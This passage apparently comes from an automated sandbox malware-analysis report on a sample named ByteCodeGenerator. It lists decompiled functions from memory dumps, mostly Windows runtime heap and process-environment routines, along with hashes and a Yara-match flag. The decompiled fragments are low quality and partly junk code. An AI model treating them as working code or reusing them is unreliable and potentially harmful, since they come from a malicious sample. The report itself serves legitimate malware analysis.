                                  							__eflags =  *0x3518724 & 0x00000004;
                                  							if(( *0x3518724 & 0x00000004) == 0) {
                                  								asm("int3");
                                  								return _t3;
                                  							}
                                  						} else {
                                  							_t3 =  *0x7ffe02d4 & 0x00000003;
                                  							__eflags = _t3 - 3;
                                  							if(_t3 == 3) {
                                  								goto L5;
                                  							}
                                  						}
                                  					}
                                  					return _t3;
                                  				} else {
                                  					_t7 =  *0x3518724; // 0x0
                                  					return E034D8DF1(__ebx, 0xc0000374, 0x3515890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                  				}
                                  			}







                                  0x034e2076
                                  0x034e2078
                                  0x034e207d
                                  0x034e2083
                                  0x034e20a4
                                  0x034e20aa
                                  0x034e20ac
                                  0x034e20b7
                                  0x034e20ba
                                  0x034e20bc
                                  0x034e20c9
                                  0x034e20c9
                                  0x034e20d0
                                  0x034e20d2
                                  0x00000000
                                  0x034e20d2
                                  0x034e20be
                                  0x034e20c3
                                  0x034e20c5
                                  0x034e20c7
                                  0x00000000
                                  0x00000000
                                  0x034e20c7
                                  0x034e20bc
                                  0x034e20d4
                                  0x034e2085
                                  0x034e2085
                                  0x034e20a3
                                  0x034e20a3

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98de42b9b25127b23a0911cd9f01e4b2136f92e775ea4589dfb83ea31c2b1509
                                  • Instruction ID: 25ffe8b85fc2dbb0d2c96aca31715cf06fa7a4c08b97ef39425847d88cab1bc0
                                  • Opcode Fuzzy Hash: 98de42b9b25127b23a0911cd9f01e4b2136f92e775ea4589dfb83ea31c2b1509
                                  • Instruction Fuzzy Hash: DEF0272B4112944FDE32FB2570116E22BD9D785112B0D0887D5901F348C9B58887EA1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 43%
                                  			E034F8D34(intOrPtr __ecx, intOrPtr __edx) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				short _v42;
                                  				char _v48;
                                  				signed char* _t12;
                                  				intOrPtr _t18;
                                  				intOrPtr _t24;
                                  				intOrPtr _t25;
                                  				signed int _t26;
                                  
                                  				_t23 = __edx;
                                  				_v8 =  *0x351d360 ^ _t26;
                                  				_v16 = __ecx;
                                  				_v42 = 0x1c2b;
                                  				_v12 = __edx;
                                  				if(E03447D50() == 0) {
                                  					_t12 = 0x7ffe0386;
                                  				} else {
                                  					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  				}
                                  				_push( &_v48);
                                  				_push(8);
                                  				_push(0x20402);
                                  				_push( *_t12 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                  			}













                                  0x034f8d34
                                  0x034f8d43
                                  0x034f8d4b
                                  0x034f8d4e
                                  0x034f8d52
                                  0x034f8d5c
                                  0x034f8d6e
                                  0x034f8d5e
                                  0x034f8d67
                                  0x034f8d67
                                  0x034f8d79
                                  0x034f8d7a
                                  0x034f8d7c
                                  0x034f8d81
                                  0x034f8d94

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e0831aa0be4e4c5c1356f9a3ff10d20895319849c10f0bec3008061dd6fc6b14
                                  • Instruction ID: 5f8b7e5e819f35d207732c81cc96241355160ebea072ae1721d58495b151362e
                                  • Opcode Fuzzy Hash: e0831aa0be4e4c5c1356f9a3ff10d20895319849c10f0bec3008061dd6fc6b14
                                  • Instruction Fuzzy Hash: 7AF0BE74A04708AFDB04EFB9D441A6EB7B4EF18300F1480AAE915EF390EA34D901CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 36%
                                  			E034F8B58(intOrPtr __ecx) {
                                  				signed int _v8;
                                  				intOrPtr _v20;
                                  				short _v46;
                                  				char _v52;
                                  				signed char* _t11;
                                  				intOrPtr _t17;
                                  				intOrPtr _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t24;
                                  				signed int _t25;
                                  
                                  				_v8 =  *0x351d360 ^ _t25;
                                  				_v20 = __ecx;
                                  				_v46 = 0x1c26;
                                  				if(E03447D50() == 0) {
                                  					_t11 = 0x7ffe0386;
                                  				} else {
                                  					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  				}
                                  				_push( &_v52);
                                  				_push(4);
                                  				_push(0x402);
                                  				_push( *_t11 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                  			}













                                  0x034f8b67
                                  0x034f8b6f
                                  0x034f8b72
                                  0x034f8b7d
                                  0x034f8b8f
                                  0x034f8b7f
                                  0x034f8b88
                                  0x034f8b88
                                  0x034f8b9a
                                  0x034f8b9b
                                  0x034f8b9d
                                  0x034f8ba2
                                  0x034f8bb5

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8041ce245c0de5d6dab0d5af75394c4a3dcb90726c1e21bbb8bfc7a9628033b0
                                  • Instruction ID: 1e57d5407960e2840f51fb197582726cdebe542c50487ff4240673b51dba815e
                                  • Opcode Fuzzy Hash: 8041ce245c0de5d6dab0d5af75394c4a3dcb90726c1e21bbb8bfc7a9628033b0
                                  • Instruction Fuzzy Hash: DFF05EB4A14258AFDB00EFA9D906E6EB7B4EB04200F04045ABA15DF391EB74D901C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E03424F2E(void* __ecx, char _a4) {
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t17;
                                  				void* _t19;
                                  				void* _t20;
                                  				void* _t21;
                                  
                                  				_t18 = __ecx;
                                  				_t21 = __ecx;
                                  				if(__ecx == 0) {
                                  					L6:
                                  					__eflags = _a4;
                                  					if(__eflags != 0) {
                                  						L8:
                                  						E034F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                  						L9:
                                  						return 0;
                                  					}
                                  					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                  					if(__eflags != 0) {
                                  						goto L9;
                                  					}
                                  					goto L8;
                                  				}
                                  				_t18 = __ecx + 0x30;
                                  				if(E0344C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3401030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                  					goto L6;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}









                                  0x03424f2e
                                  0x03424f34
                                  0x03424f38
                                  0x03480b85
                                  0x03480b85
                                  0x03480b89
                                  0x03480b9a
                                  0x03480b9a
                                  0x03480b9f
                                  0x00000000
                                  0x03480b9f
                                  0x03480b94
                                  0x03480b98
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03480b98
                                  0x03424f3e
                                  0x03424f48
                                  0x00000000
                                  0x03424f6e
                                  0x00000000
                                  0x03424f70

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4301820c26daab735c69d974bed645692fffbd27f919d436e66f094b047e8cbe
                                  • Instruction ID: 8f4a7a2e71b790f365fa6cd90dfba5717c023a486023b560cd39d3d9d52a61dd
                                  • Opcode Fuzzy Hash: 4301820c26daab735c69d974bed645692fffbd27f919d436e66f094b047e8cbe
                                  • Instruction Fuzzy Hash: 13F09A36522694AED771E799C180B2BB798AB006B8F4944B6D4058FA21C724E848C648
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E0344746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                  				signed int _t8;
                                  				void* _t10;
                                  				short* _t17;
                                  				void* _t19;
                                  				intOrPtr _t20;
                                  				void* _t21;
                                  
                                  				_t20 = __esi;
                                  				_t19 = __edi;
                                  				_t17 = __ebx;
                                  				if( *((char*)(_t21 - 0x25)) != 0) {
                                  					if(__ecx == 0) {
                                  						E0343EB70(__ecx, 0x35179a0);
                                  					} else {
                                  						asm("lock xadd [ecx], eax");
                                  						if((_t8 | 0xffffffff) == 0) {
                                  							_push( *((intOrPtr*)(__ecx + 4)));
                                  							E034695D0();
                                  							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                  							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                  							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                  						}
                                  					}
                                  					L10:
                                  				}
                                  				_t10 = _t19 + _t19;
                                  				if(_t20 >= _t10) {
                                  					if(_t19 != 0) {
                                  						 *_t17 = 0;
                                  						return 0;
                                  					}
                                  				}
                                  				return _t10;
                                  				goto L10;
                                  			}









                                  0x0344746d
                                  0x0344746d
                                  0x0344746d
                                  0x03447471
                                  0x03447488
                                  0x0348f92d
                                  0x0344748e
                                  0x03447491
                                  0x03447495
                                  0x0348f937
                                  0x0348f93a
                                  0x0348f94e
                                  0x0348f953
                                  0x0348f956
                                  0x0348f956
                                  0x03447495
                                  0x00000000
                                  0x03447488
                                  0x03447473
                                  0x03447478
                                  0x0344747d
                                  0x03447481
                                  0x00000000
                                  0x03447481
                                  0x0344747d
                                  0x0344747a
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cb9a00085f6613f4b16dc2c08ab592ad568119c817bdb28f6b8c33fbd9d932f
                                  • Instruction ID: f03591d022ec8db42f5a48cddbaecfe4dda406d7eaca683301b1ce0ca00c1a7d
                                  • Opcode Fuzzy Hash: 3cb9a00085f6613f4b16dc2c08ab592ad568119c817bdb28f6b8c33fbd9d932f
                                  • Instruction Fuzzy Hash: D1F0B439901244AEEF11DB6CE540B7ABF71AF04310F08057BD4F1AF260E76498038B8D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 36%
                                  			E034F8CD6(intOrPtr __ecx) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				short _v38;
                                  				char _v44;
                                  				signed char* _t11;
                                  				intOrPtr _t17;
                                  				intOrPtr _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t24;
                                  				signed int _t25;
                                  
                                  				_v8 =  *0x351d360 ^ _t25;
                                  				_v12 = __ecx;
                                  				_v38 = 0x1c2d;
                                  				if(E03447D50() == 0) {
                                  					_t11 = 0x7ffe0386;
                                  				} else {
                                  					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                  				}
                                  				_push( &_v44);
                                  				_push(0xffffffe4);
                                  				_push(0x402);
                                  				_push( *_t11 & 0x000000ff);
                                  				return E0346B640(E03469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                  			}













                                  0x034f8ce5
                                  0x034f8ced
                                  0x034f8cf0
                                  0x034f8cfb
                                  0x034f8d0d
                                  0x034f8cfd
                                  0x034f8d06
                                  0x034f8d06
                                  0x034f8d18
                                  0x034f8d19
                                  0x034f8d1b
                                  0x034f8d20
                                  0x034f8d33

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3f0f017019f65734369b4c4620cd9835e01d81b754e701fe19f2f785a234108
                                  • Instruction ID: 8221143897499d43109eff8b0f0f6fc5568d85c87aa51db5cb953fa5fc30fff7
                                  • Opcode Fuzzy Hash: f3f0f017019f65734369b4c4620cd9835e01d81b754e701fe19f2f785a234108
                                  • Instruction Fuzzy Hash: BAF08275A04648AFDB04EFA9E945E6EB7B4EF18200F14019AE915EF390EA34D900C759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0345A44B(signed int __ecx) {
                                  				intOrPtr _t13;
                                  				signed int _t15;
                                  				signed int* _t16;
                                  				signed int* _t17;
                                  
                                  				_t13 =  *0x3517b9c; // 0x0
                                  				_t15 = __ecx;
                                  				_t16 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                  				if(_t16 == 0) {
                                  					return 0;
                                  				}
                                  				 *_t16 = _t15;
                                  				_t17 =  &(_t16[2]);
                                  				E0346FA60(_t17, 0, _t15 << 2);
                                  				return _t17;
                                  			}







                                  0x0345a44b
                                  0x0345a453
                                  0x0345a472
                                  0x0345a476
                                  0x00000000
                                  0x0345a493
                                  0x0345a47a
                                  0x0345a47f
                                  0x0345a486
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b1e5069168b6c5d78ad24a8ec03ecd413bc72859de3c7825f433120d0e610f9
                                  • Instruction ID: f214be8edfffe8aa43af336ecab867867ddd1727fad389307c8ce31193b80437
                                  • Opcode Fuzzy Hash: 9b1e5069168b6c5d78ad24a8ec03ecd413bc72859de3c7825f433120d0e610f9
                                  • Instruction Fuzzy Hash: 47E09272A01421AFD212DF59BC00F67B39DEBD5A51F09413AF904CF224D628DD06C7E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0342F358(void* __ecx, signed int __edx) {
                                  				char _v8;
                                  				signed int _t9;
                                  				void* _t20;
                                  
                                  				_push(__ecx);
                                  				_t9 = 2;
                                  				_t20 = 0;
                                  				if(E0345F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                  					_t20 = L03444620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                  				}
                                  				return _t20;
                                  			}






                                  0x0342f35d
                                  0x0342f361
                                  0x0342f367
                                  0x0342f372
                                  0x0342f38c
                                  0x0342f38c
                                  0x0342f394

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                  • Instruction ID: 2508a020675cf9e6dc3e7e3969532e089ad41f341b0b2c9bbe8dae9b42ab1d3b
                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                  • Instruction Fuzzy Hash: 9FE0D832A40228FFDB21E6DA9D05F5BFFBCDB44A60F440156F904EF150D5649D00C2D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0343FF60(intOrPtr _a4) {
                                  				void* __ecx;
                                  				void* __ebp;
                                  				void* _t13;
                                  				intOrPtr _t14;
                                  				void* _t15;
                                  				void* _t16;
                                  				void* _t17;
                                  
                                  				_t14 = _a4;
                                  				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x34011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                  					return E034F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                  				} else {
                                  					return E03440050(_t14);
                                  				}
                                  			}










                                  0x0343ff66
                                  0x0343ff6b
                                  0x00000000
                                  0x0343ff8f
                                  0x00000000
                                  0x0343ff8f

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77259b056aff8609cba582f2d14d25d94f8378d97e5cb8f8c4625eb9c598b6ab
                                  • Instruction ID: f78552b8a621c35a748158f6cb3c9e7f1018260f8d402a1f9caa7fbd145bab55
                                  • Opcode Fuzzy Hash: 77259b056aff8609cba582f2d14d25d94f8378d97e5cb8f8c4625eb9c598b6ab
                                  • Instruction Fuzzy Hash: 49E0DFB4A053049FD734DB52D040F27779C9B4B729F1D80AFE8084FA01C621D885C20E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034DD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                  				void* _t5;
                                  
                                  				if(_a4 != 0) {
                                  					_t5 = L0342E8B0(__ecx, _a4, 0xfff);
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                  					return _t5;
                                  				}
                                  				return 0xc000000d;
                                  			}




                                  0x034dd38a
                                  0x034dd39b
                                  0x034dd3b1
                                  0x00000000
                                  0x034dd3b6
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                  • Instruction ID: 134062e21390ddcf6cf5b81af87e261053370a34cb8601fc59a09864243a5d4d
                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                  • Instruction Fuzzy Hash: C3E0C235280314BBEB229E44CC00F697B1AEF417A0F104036FE08AFB90C671AC92D6C8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E034B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                  				void* _t5;
                                  				void* _t14;
                                  
                                  				_push(8);
                                  				_push(0x35008f0);
                                  				_t5 = E0347D08C(__ebx, __edi, __esi);
                                  				if( *0x35187ec == 0) {
                                  					E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                  					if( *0x35187ec == 0) {
                                  						 *0x35187f0 = 0x35187ec;
                                  						 *0x35187ec = 0x35187ec;
                                  						 *0x35187e8 = 0x35187e4;
                                  						 *0x35187e4 = 0x35187e4;
                                  					}
                                  					 *(_t14 - 4) = 0xfffffffe;
                                  					_t5 = L034B4248();
                                  				}
                                  				return E0347D0D1(_t5);
                                  			}





                                  0x034b41e8
                                  0x034b41ea
                                  0x034b41ef
                                  0x034b41fb
                                  0x034b4206
                                  0x034b420b
                                  0x034b4216
                                  0x034b421d
                                  0x034b4222
                                  0x034b422c
                                  0x034b4231
                                  0x034b4231
                                  0x034b4236
                                  0x034b423d
                                  0x034b423d
                                  0x034b4247

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e104602a53e897cdbfbdd92a65af747e8f10550f1c344d37e17ab618a10c2e16
                                  • Instruction ID: dec9a40eb884098063ea9f2e0891626e8d0f4bf12538256afc38cdcbb88c4580
                                  • Opcode Fuzzy Hash: e104602a53e897cdbfbdd92a65af747e8f10550f1c344d37e17ab618a10c2e16
                                  • Instruction Fuzzy Hash: AAF0157A921724CEDBB8EFAAA500B5836B4FB44311F00416A81508F3A9C73644CAEF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0345A185() {
                                  				void* __ecx;
                                  				intOrPtr* _t5;
                                  
                                  				if( *0x35167e4 >= 0xa) {
                                  					if(_t5 < 0x3516800 || _t5 >= 0x3516900) {
                                  						return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                  					} else {
                                  						goto L1;
                                  					}
                                  				} else {
                                  					L1:
                                  					return E03440010(0x35167e0, _t5);
                                  				}
                                  			}





                                  0x0345a190
                                  0x0345a1a6
                                  0x0345a1c2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0345a192
                                  0x0345a192
                                  0x0345a19f
                                  0x0345a19f

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 94b1433da0525eb3e31c4636a675c89e782b34631676e5b3992e32c5c8d0252a
                                  • Instruction ID: b9bad5d72d269b4a33e4c2096c0a890e00b580378f41b5d677a79f349d3c4153
                                  • Opcode Fuzzy Hash: 94b1433da0525eb3e31c4636a675c89e782b34631676e5b3992e32c5c8d0252a
                                  • Instruction Fuzzy Hash: 1DD02B22A210041FE71EE714AA14B217296F780700F30091FFA030E6B5DB50C8F5D10C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034516E0(void* __edx, void* __eflags) {
                                  				void* __ecx;
                                  				void* _t3;
                                  
                                  				_t3 = E03451710(0x35167e0);
                                  				if(_t3 == 0) {
                                  					_t6 =  *[fs:0x30];
                                  					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                  						goto L1;
                                  					} else {
                                  						return L03444620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                  					}
                                  				} else {
                                  					L1:
                                  					return _t3;
                                  				}
                                  			}





                                  0x034516e8
                                  0x034516ef
                                  0x034516f3
                                  0x034516fe
                                  0x00000000
                                  0x03451700
                                  0x0345170d
                                  0x0345170d
                                  0x034516f2
                                  0x034516f2
                                  0x034516f2
                                  0x034516f2

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e96a55b98ef5dbb9eb5e3f43d6207e0d95fba1ca3444901c374b07806dd56fc9
                                  • Instruction ID: 6cd511ee1e295884247dbfbefce7aa702a36c058327291769cccbf3a9620ecfc
                                  • Opcode Fuzzy Hash: e96a55b98ef5dbb9eb5e3f43d6207e0d95fba1ca3444901c374b07806dd56fc9
                                  • Instruction Fuzzy Hash: B8D0A73124120057EE2DDB169804B157251EB80781F3C006EF9074D9E2CFA4CCA2E44C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 25%
                                  			E00406EAA(void* __eax, char __ebx, void* __ecx, signed int __esi) {
                                  
                                  				asm("in al, dx");
                                  				 *((char*)(__ecx + 0x7b + __esi * 8)) = __ebx;
                                  				_push(__esi);
                                  				asm("sbb eax, 0x14656362");
                                  				return 1;
                                  			}



                                  0x00406eaa
                                  0x00406eab
                                  0x00406eaf
                                  0x00406eb0
                                  0x00406ec8

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_ByteCodeGenerator.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4975de309cae4149b0eeb9503f3f25e187aed9daa419106356fadb4798d5ac32
                                  • Instruction ID: a8b10821f4a7cc52229d4f3803341ca70ff2b6cf7d6340ba7884dad9ae225cd6
                                  • Opcode Fuzzy Hash: 4975de309cae4149b0eeb9503f3f25e187aed9daa419106356fadb4798d5ac32
                                  • Instruction Fuzzy Hash: FFC01221A1524804D1204D2C78415B4EB584B2726CE04379B988CF79618043C4024149
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034A53CA(void* __ebx) {
                                  				intOrPtr _t7;
                                  				void* _t13;
                                  				void* _t14;
                                  				intOrPtr _t15;
                                  				void* _t16;
                                  
                                  				_t13 = __ebx;
                                  				if( *((char*)(_t16 - 0x65)) != 0) {
                                  					E0343EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                  					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                  					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                  				}
                                  				if(_t15 != 0) {
                                  					L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                  					return  *((intOrPtr*)(_t16 - 0x64));
                                  				}
                                  				return _t7;
                                  			}








                                  0x034a53ca
                                  0x034a53ce
                                  0x034a53d9
                                  0x034a53de
                                  0x034a53e1
                                  0x034a53e1
                                  0x034a53e6
                                  0x034a53f3
                                  0x00000000
                                  0x034a53f8
                                  0x034a53fb

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                  • Instruction ID: c0113c0c77d36978fcfd59f03efa8e16731497087268bd737f6a08a1ad2604a8
                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                  • Instruction Fuzzy Hash: 8EE04636900B809FCB12DB49C650F4AB7F5BB85B00F180459A4085F660C624A800CB00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0343AAB0() {
                                  				intOrPtr* _t4;
                                  
                                  				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                  				if(_t4 != 0) {
                                  					if( *_t4 == 0) {
                                  						goto L1;
                                  					} else {
                                  						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0x7ffe0030;
                                  				}
                                  			}




                                  0x0343aab6
                                  0x0343aabb
                                  0x0348a442
                                  0x00000000
                                  0x0348a448
                                  0x0348a454
                                  0x0348a454
                                  0x0343aac1
                                  0x0343aac1
                                  0x0343aac6
                                  0x0343aac6

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_3400000_ByteCodeGenerator.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                  • Instruction ID: 411fac0a729983be799e7e25e7c2b45c1bc505393b037eab99567c12ead5e290
                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                  • Instruction Fuzzy Hash: 52D0E935352980CFD616DB1DC554B1673A8FB45B44FC904D1E541CF761E66DD944CA04
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E034535A1(void* __eax, void* __ebx, void* __ecx) {
                                  				void* _t6;
                                  				void* _t10;
                                  				void* _t11;
                                  
                                  				_t10 = __ecx;
                                  				_t6 = __eax;
